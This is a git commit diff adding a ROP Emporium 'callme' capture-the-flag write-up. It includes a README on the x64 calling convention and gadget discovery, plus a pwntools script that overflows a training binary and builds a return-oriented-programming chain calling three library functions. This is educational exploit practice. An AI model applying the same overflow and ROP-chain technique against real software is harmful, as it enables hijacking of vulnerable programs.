cynops
diff --git a/‎Rop-Emporium/callme/Images/flag.png‎
33.5 KB b/‎Rop-Emporium/callme/Images/flag.png‎
33.5 KB
diff --git a/‎Rop-Emporium/callme/Images/functions.png‎
6.21 KB b/‎Rop-Emporium/callme/Images/functions.png‎
6.21 KB
diff --git a/‎Rop-Emporium/callme/Images/gadget.png‎
8.35 KB b/‎Rop-Emporium/callme/Images/gadget.png‎
8.35 KB
diff --git a/‎Rop-Emporium/callme/README.md‎
Lines changed: 67 additions & 0 deletions b/‎Rop-Emporium/callme/README.md‎
Lines changed: 67 additions & 0 deletions
diff --git a/‎Rop-Emporium/callme/callme64‎
13 KB b/‎Rop-Emporium/callme/callme64‎
13 KB
diff --git a/‎Rop-Emporium/callme/encrypted_flag.txt‎
Lines changed: 1 addition & 0 deletions b/‎Rop-Emporium/callme/encrypted_flag.txt‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎Rop-Emporium/callme/exploit-callme64.py‎
Lines changed: 29 additions & 0 deletions b/‎Rop-Emporium/callme/exploit-callme64.py‎
Lines changed: 29 additions & 0 deletions
diff --git a/‎Rop-Emporium/callme/key1.dat‎
Lines changed: 2 additions & 0 deletions b/‎Rop-Emporium/callme/key1.dat‎
Lines changed: 2 additions & 0 deletions
diff --git a/‎Rop-Emporium/callme/key2.dat‎
Lines changed: 1 addition & 0 deletions b/‎Rop-Emporium/callme/key2.dat‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎Rop-Emporium/callme/libcallme.so‎
8.38 KB b/‎Rop-Emporium/callme/libcallme.so‎
8.38 KB
@@ -0,0 +1,67 @@
+# callme
+
+> Reliably make consecutive calls to imported functions. Use some new techniques and learn about the Procedure Linkage Table.
+> Click below to download the binary.
+>
+> Url: https://ropemporium.com/challenge/callme.html
+
+
+
+### x64 Solution
+
+We must call **callme_one(), callme_two()** and **callme_three()** in that order, each with the arguments 1,2,3 e.g. **callme_one(1,2,3)** to print the flag
+
+![](Images/functions.png)
+
+
+
+**x64 Calling Convention**
+
+- First argument: `rdi`
+- Second argument: `rsi`
+- Third argument: `rdx`
+
+
+
+```bash
+~$ ropper -f callme64 > callme64-gadgets.txt
+```
+
+![](Images/gadget.png)
+
+
+
+```python
+from pwn import *
+
+elf = ELF('./callme64')
+
+context.terminal=['tmux','sp','-h']
+#context.log_level='DEBUG'
+
+io=process(elf.path)
+payload= flat( 'A'*40 ,
+ 0x401ab0, #0x0000000000401ab0: pop rdi; pop rsi; pop rdx; ret;
+ 1, #argument 1
+ 2, # argument 2
+ 3, # argument 3
+ elf.sym['callme_one'],
+ 0x401ab0, #0x0000000000401ab0: pop rdi; pop rsi; pop rdx; ret;
+ 1,
+ 2,
+ 3,
+ elf.sym['callme_two'],
+ 0x401ab0, #0x0000000000401ab0: pop rdi; pop rsi; pop rdx; ret;
+ 1,
+ 2,
+ 3,
+ elf.sym['callme_three'],
+ endianness='little',word_size=64,sign=False)
+
+io.recvuntil('> ')
+io.sendline(payload)
+io.interactive()
+```
+
+![](Images/flag.png)
+
@@ -0,0 +1 @@
+SMSA~gXxekhieactt`L''tnl|E}p|y>]!
@@ -0,0 +1,29 @@
+from pwn import *
+
+elf = ELF('./callme64')
+
+context.terminal=['tmux','sp','-h']
+#context.log_level='DEBUG'
+
+io=process(elf.path)
+payload= flat( 'A'*40 ,
+ 0x401ab0, #0x0000000000401ab0: pop rdi; pop rsi; pop rdx; ret;
+ 1, #argument 1
+ 2, # argument 2
+ 3, # argument 3
+ elf.sym['callme_one'],
+ 0x401ab0, #0x0000000000401ab0: pop rdi; pop rsi; pop rdx; ret;
+ 1,
+ 2,
+ 3,
+ elf.sym['callme_two'],
+ 0x401ab0, #0x0000000000401ab0: pop rdi; pop rsi; pop rdx; ret;
+ 1,
+ 2,
+ 3,
+ elf.sym['callme_three'],
+ endianness='little',word_size=64,sign=False)
+
+io.recvuntil('> ')
+io.sendline(payload)
+io.interactive()
@@ -0,0 +1,2 @@
+
+
 
@@ -0,0 +1 @@
+